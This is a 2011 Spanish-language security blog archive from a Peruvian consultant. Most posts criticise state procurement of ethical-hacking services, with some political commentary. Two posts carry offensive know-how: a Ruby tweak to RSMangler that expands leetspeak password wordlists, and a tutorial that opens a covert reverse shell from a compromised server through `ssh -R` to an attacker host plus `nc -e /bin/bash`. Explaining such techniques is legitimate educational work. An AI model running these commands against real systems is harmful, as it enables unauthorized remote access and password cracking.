Thursday, July 21, 2011

RSMangler personalizado para generar mas palabras h4x0r

El otro dia uno de los colegas en Open-Sec me hablaba sobre su fascinacion con CUPP (http://www.remote-exploit.org/?p=546) y como hacia algo que RSMangler no hace por default : generar palabras en h4x0r y someterlas a las mismas combinaciones que hace con las palabras normales.

Cuando uno pasa palabras de entrada a RSMangler y le pide generar palabras h4x0r a partir de las originales (opcion leet que esta activa por default), solamente genera una palabra h4x0r por cada palabra original y no la combina con otros valores como hace con las palabras originales y normales (numeros, letras, años, caracteres especiales). CUPP si lo hace.

Entonces, aparecio el reto y, en realidad, solo posteo esto para que se aprecie el valor del software abierto que permite que uno siga usando su aplicacion favorita solamente haciendo pequeños cambios al codigo fuente (en este caso es mas patente aun porque RSMangler es un script en Ruby).

La seccion de programa que hay que adicionar antes del loop de generacion es :

file_words.each { |y|
wordlist << y.gsub(/e/, "3").gsub(/a/, "4").gsub(/o/, "0").gsub(/i/, "1").gsub(/l/, "1")
}

wordlist.each { |x|
results << x

results << x+x if double
results << x.reverse if reverse
results << x.capitalize if capital
results << x.downcase if lower
results << x.upcase if upper
results << x.swapcase if swap
results << x + "ed" if ed
results << x + "ing" if ing

if common
(Continua el loop de generacion).

Como se ve, genera las palabras h4x0r adicionandolas a la lista original de forma que cuando entra al loop de permutaciones y generacion de palabras, tambien son afectadas, es decir, combinadas con los otros valores. De esta forma, esta funcionalidad hace lo mismo que CUPP.

Tambien es importante resaltar, por si no se aprecio, que la porcion de codigo necesaria ya se encuentra en el programa y solamente se aplica antes del loop de generacion.

NTP 17799 de cumplimiento obligatorio con fecha limite 31.12.2012

Esta norma ha hecho mucho bien a las organizaciones del Estado peruano porque ha hecho que esten mas concientizados, no importa que la mayoria ni siquiera ha leido el documento.

Tambien ha sido positivo porque al amparo de dicha norma, se han hecho evaluaciones de seguridad y negativa porque ha sido utilizada para justificar compras de productos que ni los usan o los usan mal.

Ahora, nuevamente se pone una fecha limite de cumplimiento como se hizo hace años. Que paso con los que no cumplieron ? Nada! Quien evalua el cumplimiento ? Nadie!

El Decreto no hace otra cosa que ser majadero al pedir cumplir con tener un plan de seguridad como si alguna organizacion en el mundo pudiese tomar la NTP 17799 (ISO 27002) y cumplir al 100% con todo lo expuesto en ella. Eso implica desconocer el estado evolutivo (involutivo en algunas entidades como la ONGEI) de toda organizacion y que eso es precisamente la base de tener un estandar que si es certificable (evaluable, comprobable, controlable) como el ISO 27001.

Definitivamente, yo ando pensando que solamente "la empresa privada" es la asesora de ONGEI y que cosas como esta obligatoriendad podrian estar apuntando a dejar sembradas opciones de negocio para esa "empresa privada". Espero equivocarme y que esto no sea asi.

Espero tambien, que el proximo gobierno ponga orden y defina una Oficina Nacional de Seguridad que defina la estrategia nacional de seguridad de la informacion y seguridad informatica.

Thursday, July 14, 2011

Resultados del Concurso en SUNARP

La información esta en el web de SEACE y aunque no es sopresa el postor que obtuvo la buena pro, si es de particular interes una nota colocado en el cuadro de calificación técnica que dice :
"(*) El Certificado CISSP correspondiente al SR. Juan Pablo Baby fernandez, se encuentra expirado a mayo de 2011, por lo que el postor no acredita contar con 02 profesionales con certificación CISSP."
Qué pasó? Otra vez no se dieron cuenta que presentaban un certificado expirado ? Presentaron un C|EH (hasta donde se, la persona mencionada esta certificada como tal), pidieron el certificado que muestre que esta vigente su certificación y que mantiene sus 120 ECE por año ?
La verdad es que estos puntos determinan la calidad de postor, proveedor y consultores y por ello es que debería ser revisado cuidadosamente.
Y qué pasó con los otros que participaron en el estudio de mercado e incluso en el proceso mismo ? Por qué finalmente no cotizaron ? No calificaban ?

Friday, July 08, 2011

Se vende cebo de culebra...ah! y tambien inventamos metodologias y certificaciones internacionales de prestigio!

Parece que existe una fuente inagotable de ganas de hacer que nuestras entidades del Estado aparezcan como las más desinformadas de este planeta Tierra.

En unos Terminos de Referencia pude observar el otro dia que pedian cumplir con las siguientes metodologias :
  1. Open Source Security Testing Methodology
  2. SANS Institute Security Testing Best Practices
  3. CERT Security Testing Best Practices
  4. NIST Security & Risk Management Best Practices
  5. NIST Special Publication 800-115
  6. Open Web Application Security Project
Lo terrible de este requerimiento es que las numero 2, 3 y 4 NO EXISTEN. Una rapida busqueda por Internet (Google, Bing y entrando a los sitios de cada organizacion) nos muestra unicamente una presentacion hecha por Deloitte en Europa.

Luego, en otros Terminos de Referencia, para garantizar que los evaluadores tengan un nivel de conocimiento adecuado se exigen certificaciones y esto es 100% correcto y adecuado. Lo gracioso y tragi-comico es que a la par que las certificaciones de ISC2, ISACA, EC Council, Offensive Security, GIAC, Mile2 ponen dos mas bien particulares :
  • eCPPT que es una bastante nueva y que se esta empezando a difundir. No se tiene informacion de la cantidad de personas certificadas en el mundo, pero, se que al menos aca hay una persona certificada.
  • SOHP Stack Overflow Hacking Professional que, despues de este post, por fin vera la luz del mundo...sencillamente esta certificacion NO EXISTE o, si existe, debe ser tan reservada y privada que solamente su poseedores saben de su existencia. Esto es una burla tremenda que equivaldria a quere posicionar el Open-Sec Ethical Hacker al nivel de las certificaciones de EC Council, GIAC, Offensive Security, Mile2 e incluso la de eCPPT!
Por esas razones es que es post inicia diciendo "Se vende cebo de culebra..." porque eso les venden CASI TODOS a las entidades del Estado.

El problema a resolver es la falta de conocimiento de las personas que elaboran estas especificaciones en el Estado, pero, me preocupa mas la falta de etica de quienes les plantean exigir cosas que no existen y eso es una BURLA al intelecto.

Y ojo que si la existencia e internacionalizacion de las certificaciones determina que puedan considerarse como garantia para servicios de ethical hacking, entonces, consideremos al OSEH porque tiene mas de 250 personas certificadas entre Perú, Ecuador y Honduras. Algo que no haremos porque no nos dedicamos ni a la educacion y a certificar personas como core de nuestro negocio.

Apliquen metodologias de verdad! Vayan y saquen certificaciones de alto nivel! No tengan miedo! No se burlen del intelecto de las personas!

Buen fin de semana!

Friday, July 01, 2011

Proceso publico en SUNARP : S/.171,850 por un ethical hacking tradicional a 97 hosts (aproximadamente)

No pensaba expresarme publicamente al respecto, pero, dados mis posts pasados y el comentario a la nota de ISSA Perú, no puedo dejar pasar esta equivocada forma de contratar un servicio de ethical hacking.

Se trata de un servicio tradicional de ethical hacking para aproximadamente 97 hosts. En forma interna (65) y externa (32). Dejare el tema monetario para el final.

A los consultores se les exige ser Ingenieros Titulados con 5 años de experiencia laboral unicamente sin especificar que tipo de experiencia. Lo primero es exigido por el dichoso Reglamento de Contrataciones y Adquisiciones como dije en un post anterior, PERO, no deberia exigirse experiencia en ethical hacking cuando menos ?

Vuelvo a hacer notar que deberian analizar el mercado local y ver cuantos ingenieros titulados estan metidos en temas de ethical hacking.

Luego, como certificaciones se exigen algunas referidas a seguridad de la informacion y no sobre ethical hacking y/o penetration testing que son respecto a SEGURIDAD INFORMATICA. No existe una sola persona en SUNARP que sepa esto ? Donde esta la ONGEI con sus expertos en seguridad y su apoyo de la empresa privada que no los asesora ? Para este proceso estuvo convocado un proveedor que tuvo la actitud honesta y valiente de decirles por email que no estaban haciendo un proceso que otorgue valor a la entidad y que hicieron ? Sencillamente, lo ignoraron (iniciales otra vez MC de PC, no fue nadie de Open-Sec porque ya habiamos visto fallas hace tiempo en este proceso).

La unica certificacion que se considera para dar puntaje adicional es la de C|EH, pero, recibe el mismo puntaje que una de CISSP o CISA. Por favor! A mis amigos que tienen certificaciones como esas y a los que ademas tienen sobre hacking : puede una certificacion de CISSP, Lead Auditor 27001, Cobit-F o CISA garantizar que el consultor hara una buena labor de hacking ?! NO! Grande, mayusculo y rotundo.

Y por ultimo, el precio basado en un estudio de mercado que parece haber sido hecho de forma mas consciente y responsable que otros que he podido apreciar (algunos no ponen ni el nombre de las empresas que participaron en dicho estudio). Pero, aceptar que se ponga un monto referencial de S/.171,850 por hacer ethical hacking a 97 hosts ?! Poco mas de S/.1,770 soles por host!! Wow!
Para una mejor comprension de las tasas : comprar un servicio de un reconocido como SAINT para la parte externa les salia mucho mas barato : menos de US$3,200 por los 32 hosts externos! WebSAINT PRO
Ni siquiera se piden comprobaciones manuales en todos los hosts, con lo cual, pasara lo que paso en un cliente : llegan llenos de appliances y software automatizado, lo corren, elaboran reportes tambien automatizados y 2 meses despues se les mete un intruso por una vulnerabilidad que el consabido "ethical hacking" no encontro!

Mas aun, durante el estudio de mercado y la bases publicadas no se presenta la cantidad de hosts a evaluar y se hace de conocimiento publico esta informacion en la etapa de consultas y observaciones. Quiere decir que cuando pidieron las cotizaciones si indicaron la cantidad de hosts y no la colocaron en las bases ? O es que los proveedores que cotizaron para ese estudio de mercado se lamieron el dedo, lo expusieron al aire y zas! se les vino el numero magico a la mente!

Lamentablemente, quienes deberian manifestarse se quedan callados en una sociedad hipocritamente condescendiente donde, los que se manifiestan en contra de estos atropellos al intelecto, son calificados de conflictivos.

Y por si acaso, como puede parecer a mas de uno que esta nota es una piconeria porque no dieron valor a la experiencia y certificaciones de hacking, recibi la invitacion a participar en el proceso por parte de un postor y me negue porque no estoy de acuerdo en participar en un proceso que cuestiono.

Saludos!

Tuesday, June 28, 2011

Mas sobre Anonymous en Perú

Un comentario mio a una excelente nota escrita en ISSA Perú por Roberto Puyo
http://issaperu.org/?p=445#comment-40

Thursday, June 23, 2011

Técnico : SSH port forwarding triangulado

Necesito sacarme el clavo con esto de no bloggear hace tiempo algo técnico :

Uno de los problemas que deben enfrentar un atacante al establecer conexiones desde Internet es pasar por los filtros de entrada/salida impuestos por los firewalls.
Casi siempre encontramos que las conexiones de entrada a la red estan filtradas y, por ejemplo, un servidor web comprometido solo expone TCP 80 y si acaso, 443. Como tener un shell hacia ese equipo ?

La respuesta conocida desde hace años es que se debe establecer un shell reverso y para existen desde el venerable netcat hasta su versión moderna ncat y pasando por el querido MetaSploit. Algo que también se puede usar es reDuh y, por supuesto, ssh. Hay varias guías que indican como hacerlo, pero, no he encontrado una en Español latino (o no busque bien), asi que ahi va :

1. Se debe haber conseguido alguna forma de ejecución en el servidor victima, por ejemplo, mediante un RFI, un webshell, etc., pero, que no permiten la flexibilidad de una línea de comandos de shell.

2. En el server victima digitar algo como :
victima$ssh -p 31337 -f -N -R *:8081:localhost:8080 optimusprime@hacker.no-ip.org
Esto abre un socket en el puerto 8081 de hacker.no-ip.org
Al hacer un :
victima$ps agux | grep ssh
se podrá ver el proceso ejecutando, pero, aún algo como netstat no mostrará nada.
El objetivo es que al conectarse al puerto 8081 de hacker.no-ip.org, lo redireccionará hacia el 8080 de victima sobre el canal ya establecido.

3. Correr un servicio en el puerto 8080 de la victima para que reciba la conexión reversa como por ejemplo
victima$ nc -l -v -n -p 8080 -e /bin/bash
listening on [any] 8080 ..

4. En hacker.no-ip.org podremos ver el socket aperturado en 8081
hacker:~# netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
......................................................................................................................................
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN 12060/sshd: optimusprime

5. Conectarse desde otro host al puerto 8081 de hacker.no-ip.org :
otro_host$nc -v hacker.no-ip.org 8081
Connection to hacker.no-ip.org 8081 port [tcp/tproxy] succeeded!
Aqui ya se pueden ejecutar comandos del shell, en este caso, tipo bash

6. En la victima se aprecia la conexión, no se requiere una conexión de entrada, no se generan nuevos procesos y toda la comunicación es encriptada :
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 47934

Saludos!

ADD : Verificar en /etc/ssh/sshd_config de hacker.no-ip.org, exista la linea :
GatewayPorts yes

Anonymous y Perú

Hoy día particularmente recibi varios llamados,correos, chats, etc. de consulta sobre la operación Andes Libres y la amenaza a Telefónica.

Es bien curioso como la gente se pone atenta cuando estas cosas llegan a los medios de prensa y entonces quieren hacer lo que nunca hicieron : ponerse en posición de defensa.
Como le respondi a una persona, no hay nada nuevo atras de estos ataques, las tecnicas usadas son las mismas de hace años y las vulnerabilidades son las de siempre. Entonces, el mantener seguros los activos de información no debería ser una cuestión circunstancial sino una postura continua.

Podría violar acuerdos de confidencialidad y divulgar todas las oportunidades en que contratados por entidades del gobierno para servicios de ethical hacking, hemos conseguido penetrar sus redes, pero, prefiero apuntar a quienes se erigen como representantes/miembros de Anonymous aca : http://www.piratasdelared.com/

Ayer me tome un momento para comprobar como podían haber violado la seguridad de un Ministerio local y es increíble como existían por lo menos 6 puntos de ataque sencillos. Eso demuestra que no estan seguros y los sitios que han adicionado luego lo corroboran.

Hoy veo que sale el Jefe de la ONGEI, Jaime Honores, a señalar que las entidades del gobierno se encuentran preparadas para el ataque. Este señor no solo demuestra ser un ignorante en esta materia sino que, ademas, demuestra como colocan personas sin capacidad para dirigir los destinos de la informática en el gobierno.
El seguramente cree que propiciar eventos de charlas y correrle herramientas automatizadas "con el apoyo de la empresa privada" es gestionar adecuadamente la seguridad de la información y seguridad informática. Claro, podrían decir que también existe un PeCERT, pero, saben que solo es un nombre y no es tangible.

También vi un "blogger" que salia a decir que Anonymous carecia de orden y organización y que los ataques no iban contra la data, que vea el site de Piratas de la Red pues. Otro neofito.

Para que servirá todo esto ? La verdad, servirá para que las entidades del gobierno compren mas hardware y software que ni saben que hace, pero, que si genera revenue para todos. También, contratarán consultorías con "empresas globales" y les pedirán que les hagan hackeos éticos, eso si : el personal debe ser ingeniero colegiado y tener certificaciones de seguridad de la información, no importa que no sepan ni un poco de hacking.
Resultado :falsa sensacion de seguridad, victimas voluntarias.

Es importante que se sepa que estos temas no atañen solo a tecnológos mas o menos capaces sino a temas de legislación. El otro día un amigo me pregunta : cuantos C|EH que sean ingenieros colegiados conoces ? Mi respuesta fue CERO y su pregunta era reflexiva porque el sabe la respuesta. Entonces, por que se pide esto : porque el Reglamente de Contrataciones y Adquisiciones del Estado Peruano indica que para labores de ingeniería, el personal debe ser titulado y colegiado.
De cerca de 16 C|EH en Perú, ninguno es ingeniero colegiado.
Eso requiere un cambio para poder tener organizaciones que se evaluen correctamente por personal adecuado.

En medio de todo esto hay actitudes hipócritas como las de los que se pelean por email y rajan de los demás, pero, en la foto siempre salen juntos y sonriendo. Y, también, hay actitudes valientes y honestas como la que vi hoy día de parte de un amigo (no diré su nombre por privacidad, pero, para darle una pista a el : MC) : rechazo participar en un proceso de contratacion de ethical hacking para una entidad del Estado porque analizó y determinó que el requerimiento estaba mal planteado y ello iba en contra de la calidad de servicio que merece una organización de nuestro país.

Quisiera no opinar sobre cosas como estas y seguir unicamente con temas técnicos, pero, lamentablemente, el medio que nos rodea debe limpiarse de hipócritas y gente interesada unicamente en llenarse los bolsillos a partir del tema de seguridad de la información y seguridad informática.

Monday, June 06, 2011

Sobre la CAIDA de la Bolsa de Valores de Lima despues de la eleccion de Humala

"La Bolsa de Valores de Lima es "asisito" respecto al valor de la produccion del Perú. Que se mueva esto fuerte no le hace mella al sector real de la produccion y el empleo en el Perú que es lo que le preocupa a la agente y en segundo lugar, los que participan en la bolsa, pero, no llegan ni al 0,1% de la poblacion peruana. De tal manera que al caer la bolsa afecta a una completa minoria. De tal manera que creo yo que tampoco hay que sobredimensionar esto, no? Hay que darle su importancia, si, porque afecta expectativas futuras, pero, tambien hay que decirle a la gente que a diferencia de otros paises desarrollados, aca que la bolsa caiga, su impacto, en lo que le preocupa a la gente que es su trabajo, su sueldo, su ingreso, la produccion...en el corto plazo, es casi, que no se siente." Jorge Gonzales Izquierdo, Economista. Fuente : 24 Horas, 6 de Junio del 2011. Panamericana Television.

Friday, June 03, 2011

Primer post del 2011 ? Elecciones 2011 Segunda Vuelta - Ollanta y Keiko

La verdad, me dedique mas a postear en el blog de Open-Sec aunque igual ha sido casi nada.
Me sobran temas tecnicos porque como siempre pienso : cuando alguien tecnico con blog deja de postear es porque anda con trabajo y eso me ha pasado.
Sin embargo, no puedo evitar usar este medio para manifestar mi opinion de este proceso electoral.

Debo iniciar parafraseando algo escuchado ultimamente : Toledo dijo que votar por Ollanta era un salto al vacio, creo que votar por Keiko es lanzarse de una de las torres del Centro Civico hacia el concreto.

Particularmente, mi ideologia politica siempre ha sido de corte socialista y, por ello, el hecho que Ollanta y Keiko sean los que pasen a la segunda vuelta ya es un triunfo ya que el Perú es más que Lima y mas que mi situacion economica-social-politica en particular. Es decir, elegir no pensando solo en "este me conviene y este no me conviene".

En los ultimos dos dias Ollanta ha sido acusado de todo lo que se pueda : sobornos para que salga librado de los juicios que tenia, pago de narcos en su epoca de militar, recibir dinero de Chavez y todo culminara el domingo con los tradicionales insultos a su esposa cuando vaya a votar.
Todo sin pruebas, claro, solamente la afirmacion de personas interesadas o de dudosa calaña.
Keiko dice que hay pruebas de sobornos para salir librado de juicios, donde estan las pruebas ?
Un tipo de mala calaña envio por dias a dos ancianos a la carcel con tan solo una declaracion y luego se demostro que mintio. Todo se dieron golpes de pecho. Ah! Pero, si un narco acusa a Ollanta, hay que creerle.
Un politico de US lo acusa de recibir dinero de Chavez y todos se olvidan de los Wikileaks que demostraron como los politicos en US se meten en las decisiones de otros paises. Es mas, demostraron como politicos locales acudieron al gobierno de US a pedir que impidan que gane Ollanta en el 2006 y, por ello, tuvimos la desgracia de tener un presidente como Alan Garcia.

Que tenemos por el lado de Keiko ?
Tiene una buena formacion academica fruto de la inversion hecha por nosotros los peruanos en sus estudios.
Uso el melodrama en el ultimo debate para decirnos que quiere hacer las cosas en forma diferente a su padre porque ella es madre. Detesto cuando las mujeres toman su genero para escudarse en el y , pero, aun cuando hacen uso de su condicion de madres y mas lamentable es que mencione a sus hijas para convencer a los votantes.
Se ha unido a PPK que dijo renuncio a su nacionalidad norteamericana y, en realidad, aun no hay pruebas que el tramite se haya completado. Imagino que al haber perdido estripitosamente en la primera vuelta, pidio que anulen el proceso ya que como ha dicho, sus principales ingresos vienen de US.
San Roman se une a Keiko, no importa que le patearon el trasero durante el gobierno de su padre.
Castañeda hizo la mayor publicidad de pocas obras publicas en toda la historia de Lima y los que circulamos por varios lugares de Lima, vemos que hizo muchisimo menos de lo dice.
Los demas, son relleno, pero, como sea, lo que demuestra es que Keiko se conviritio en la candidata de los perdedores de la primera vuelta. Es decir, lo que voten por ella, estaran votando por PPK y Castañeda. Votaran por los que no quieren que este pais cambie.
Ni siquiera le doy mucho al asunto de las torturas a su madre y la esterilizacion no voluntaria de miles de mujeres ante lo cual ella solo se quedo callada porque si reclamo, lo hizo en secreto.

Ollanta ha tenido el apoyo de muchos politicos y personalidades, pero, creo que no es lo mas relevante en este momento. Tal vez, rescataria el apoyo de Accion Popular, partido que nos dio a dos de los mejores presidentes de nuestro pais : Fernando Belaunde Terry y Valentin Paniagua.

Sin embargo, me da risa cuando los jovenes entusiastas, inexpertos y desinformados se sorprenden por estas alianzas. Por suerte, mi edad me ayuda a recordar historia pasada como cuando el APRA hizo coalicion con la Union Nacional Odriista en su afan por el poder.

Para alguien que vivio concientemente desde el gobierno de Velazco, como yo, es facil calificar al gobierno de Alberto Fujimori como el mejor y, principalmente, porque su labor permitio dar estabilidad economica al pais y retomar la seguridad ante el terrorismo (que ha vuelto a arreciar con el desastre de gobierno de Garcia desde el 2006). Por mi lado, la llegada de la tecnologia a Perú es lo que permitio nuestro actual avance.
En suma, se le debe mucho a Fujimori, si, ALBERTO FUJIMOR, pero, Keiko no es Alberto y no puede ser tan sirvenguenza de mostrar orgullo por el gobierno de su padre (como si ella hubiese hecho algo en ese momento como no sea estudiar en US) y, luego, deslindar su rol complaciente de "primer dama".
Todos sabemos que los votos que obtuvo en la primera vuelta no fueron por ella, mucha gente desinformada creia que votaba por Alberto Fujimori y otros por la esperanza que lo indulte.

Yo estoy seguro que si gana Keiko, como todo parece indicar, nada cambiara en el pais. Nada cambiara para los que deberia cambiar, para aquellos que mueren de frio en Puno, para aquellos que para ir al colegio deben cruzar el rio en un "deslizador" con sogas, para aquellos que mueren por desnutricion, para aquellos que no saben leer ni escribir, para aquellos que sufren la contaminacion dejada por las mineras, para aquellos que no tienen servicios de salud.
Claro, tampoco cambiara radicalmente para los "dueños" de este pais, solamente, seran mas poderosos.

Al final, si hago el analisis egoista, no me importa cual gane porque me tocara seguir trabajando como siempre, pero, como dije, el Perú es mucho mas grande que Lima.

Debo tambien analizar las propuestas. Creo que el principal error del plan de gobierno de Gana Perú fue ser una mixtura de plan de gobierno con ensayo politico. Pero, tambien creo que en nuestro pais se rehuye a ser directo, vivimos de la hipocresia constante. Nunca se dicen las cosas en la cara, se dicen a espaldas de las personas.
Sin embargo, a diferencia de lo que dijo Garcia, el territorio peruano es de los peruanos y nosotros determinamos que se hace aca o no. Osea, soy peruano para pagarle los impuestos a SUNAT, pero, no para pedir que sigan dañando nuestro territorio las mineras ?! Claro, como ningun twittero se traga el mercurio...
A ver, que vaya Garcia a decirle a los "propietarios" de Asia que ese pedazo de litoral peruano no es suyo...que vaya pues!
La inversion extranjera es importantisima, pero, que sea buena para todos. No se trata de inversion y nuevos empleos mal pagados. Que no inviertan aca porque se les deja hacer lo que les de la gana o porque la mano de obra es mas barata sino porque sera buena mano de obra.
Necesitamos ordenar el pais empezando por sus autoridades. El asunto de policias corruptos es tan malo como el de congresistas corruptos y ociosos : no se resuelve con subir sueldos sino con educacion con valores y controles efectivos.
La educacion no mejora solamente creando examenes para botar gente y remodelando los "colegios emblematicos" y la mejor prueba son todas las peleas callejeras con armas blancas que se han producido desde hace semanas en conocidos colegios limeños. Eso solo se resolveria con los profesores y autoridades educativas adecuadas.

Ante esta estupidez colectiva, lo positivo es que han surgido enfretamientos directos : los jovenes dicen lo que piensan y ellos son los que cambiaran este pais, pero, por favor informense. No sigan a lideres solo porque son "nice" o "cool" sino porque analizaron sus planteamientos e ideologia.
Un vocero de Keiko dijo que se necesitaba un gobierno pragmatico y no ideologico y me dio risa porque sono a "Keiko nos sirve porque no tiene ideas".

El tema es interminable y ya me toca seguir trabajando y ver a mi familia.

Ah! Me olvidaba, el Perú tambien es mas grande e importante que el presidente que tenga. Aun me afano porque las instituciones de mi pais obtengan buenos servicios de hacking asi no los haga mi equipo y, como varios de ellos pueden dar fe, lo hago aun asi no gane un centavo.
En otro aspecto, con mi esposa todos los dias inculcamos valores a nuestros hijos para que nuestro pais sea mejor.

Por esas razones, no importa si es Garcia el presidente o es Keiko u Ollanta, debemos apoyar las buenas acciones, controlar siempre y openernos a lo incorrecto MAS ALLA DE NUESTROS PROPIOS INTERESES.

Hasta la proxima que promete sera algo 100% tecnico, probablemente sobre lo ultimo novedoso que he venido haciendo que es hackeo de smartphones.